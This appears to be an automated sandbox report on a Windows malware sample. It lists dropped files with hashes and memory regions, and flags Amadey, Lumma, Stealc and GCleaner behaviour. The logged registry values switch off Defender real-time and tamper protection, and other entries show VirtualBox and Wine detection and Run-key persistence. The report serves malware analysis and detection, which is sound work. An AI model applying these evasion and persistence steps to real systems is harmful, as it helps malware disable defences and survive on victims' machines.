SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

memory/1440-832-0x0000000000400000-0x00000000006DF000-memory.dmp

\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe

MD5 b58b926c3574d28d5b7fdd2ca3ec30d5
SHA1 d260c4ffd603a9cfc057fcb83d678b1cecdf86f9
SHA256 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3
SHA512 b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

memory/2892-846-0x0000000001330000-0x000000000180C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs.js

MD5 8b3a4cacb4d0aaae874b2781de4f143b
SHA1 8d5779db4e0a487fc093ddbdf2beea574dd145c9
SHA256 d213e0914793d0f7df3f4e08dab9b1317889f6c30931013c9639840defd8ee7b
SHA512 57f0557b7f9ef77b0ef49d8564cc2eadecb900b0ffe82d9f1fcf74cf333341a20fd92ad0c519a6a7b5eb4401aa0b9e359e41a0126f57d453578ff7c8b868bfbb

memory/3788-881-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/3592-888-0x00000000002F0000-0x00000000006F4000-memory.dmp

memory/3592-891-0x00000000002F0000-0x00000000006F4000-memory.dmp

memory/3592-890-0x00000000002F0000-0x00000000006F4000-memory.dmp

memory/3592-894-0x0000000000B20000-0x0000000000B2E000-memory.dmp

memory/3592-895-0x0000000001040000-0x000000000109C000-memory.dmp

memory/3592-896-0x0000000000E80000-0x0000000000E92000-memory.dmp

memory/3592-897-0x0000000000F80000-0x0000000000F88000-memory.dmp

memory/3592-899-0x0000000000FA0000-0x0000000000FA8000-memory.dmp

memory/3592-898-0x0000000000F90000-0x0000000000F98000-memory.dmp

memory/3592-900-0x0000000000FB0000-0x0000000000FC8000-memory.dmp

memory/3592-901-0x00000000010A0000-0x00000000010B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\prefs-1.js

MD5 64c2bd4b663c36fa146ae07c6883ac7f
SHA1 30dbf8c06a6a042274d3589181fa291cbb5c4eeb
SHA256 4b6b88e1763da33f89e14ff393f62ef4198d0d0cf408e354c5766d08fe9d319b
SHA512 4e1f8e4913dd5fbc9ebef36a615edf4b63a2a8b9dc9a123e82d093ae6983715be9ceeaef282e6769f62849488ce5f3f9d7bece550bec837e4e132f2fd698ef39

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8488acdc837244b6de4ee772abb1cb0e
SHA1 c6e3c976ceaf3a83a828d2b0b6efaefbf8d54a42
SHA256 ad84bb7099977ad08fc9f8183febca54ae6140b224bf8ee1d693b953a6f514e1
SHA512 b115ce2df4e4fd6cdaa5ffe33cc3dc7398af2300dc810d990f67363b37c47cdc241bb6581e0c7fe228e442d8897d1fc0a5476afbd1110f325366f2558211e13e

memory/1440-931-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-933-0x0000000001330000-0x000000000180C000-memory.dmp

memory/3788-934-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/1440-935-0x0000000002B40000-0x0000000002BE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\download.bat

MD5 f2a75175c8082ccd3e1713b00556a6e2
SHA1 2f5dc37978320bc1ca207c0c0aff1240aad6c7cf
SHA256 019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686
SHA512 011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 1f94ed5ce17312d27512d0c8d8b4084d
SHA1 a6571b2b7177c1848edcaf4929e56c46b39b4548
SHA256 71072713b039a5bc215b8febb29849f49111482fd1c9a7cdad348a9bedf4791b
SHA512 e59ebbb3e2af8ba14d1c7e4573a8eba77cfe887104904861395cf15590b1a2cf17e0356c61f21e553ba234d47b26e14b6878f8130618fb77459e256b4d497a6c

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\runsteal.bat

MD5 744f8978db36b4b9db7cb6e5c8c41e08
SHA1 84321921f622d20a4d40c9bef43b7744e74aaee7
SHA256 cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468
SHA512 d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 484c58fa3d5cdfc02b2762e7c1175026
SHA1 d47d89412bab2d5f819a030df2f6069c241d4442
SHA256 81057c55ed294749a6dcad9851acea1164dcf9f4e623f1cd72081c8d700d601a
SHA512 122ede3366382dc2de7ecfabcf7fd4907e70936afa762499548806b3ab51d432c20377b32f35816ced913d3241abadc5d36557f4ae89e3ac30e88cd56ed6e59a

C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat

MD5 d1fdfad5ce7134b1ef5a54cf37001031
SHA1 82e0f4e953b3aeaca622ec071639baf6ae17aadb
SHA256 54f8474d983dc3dd78e3d3289076152651e2f8cc5f30ae3f2740ba15e71cc6a6
SHA512 b6b7b4f134a6b436cd32e39fb645d91acc12482d352158a755359d0f6cbb8fd5bab9351081916b0b638e3ff2bde4b6ac2f6202f3ca58f1146f39defc039e88e7

C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

MD5 1fed66d1f6b85bda20fe0403ca01c9bd
SHA1 6a3056191a7d8da167285b2bf5f9fa671022c8c1
SHA256 924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a
SHA512 0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

memory/3636-988-0x00000000013E0000-0x000000000140E000-memory.dmp

memory/1440-1003-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-1006-0x0000000001330000-0x000000000180C000-memory.dmp

memory/3788-1007-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/1440-1010-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-1012-0x0000000001330000-0x000000000180C000-memory.dmp

memory/3788-1013-0x0000000000400000-0x0000000000C62000-memory.dmp

memory/1440-1026-0x0000000000400000-0x00000000006DF000-memory.dmp

memory/2892-1028-0x0000000001330000-0x000000000180C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-06 02:35

Reported

2024-12-06 02:38

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c8478adf64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012582001\\c8478adf64.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8d44f9c7da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012583001\\8d44f9c7da.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\29af3f6d41.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012580001\\29af3f6d41.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ef47ac58df.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012581001\\ef47ac58df.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012580001\29af3f6d41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012581001\ef47ac58df.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012584001\1777a95027.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1012583001\8d44f9c7da.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\547aec0f988c87b03e73231738462dd61c430708e6f9120eddfa1310b34524cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1012582001\c8478adf64.exe N/A
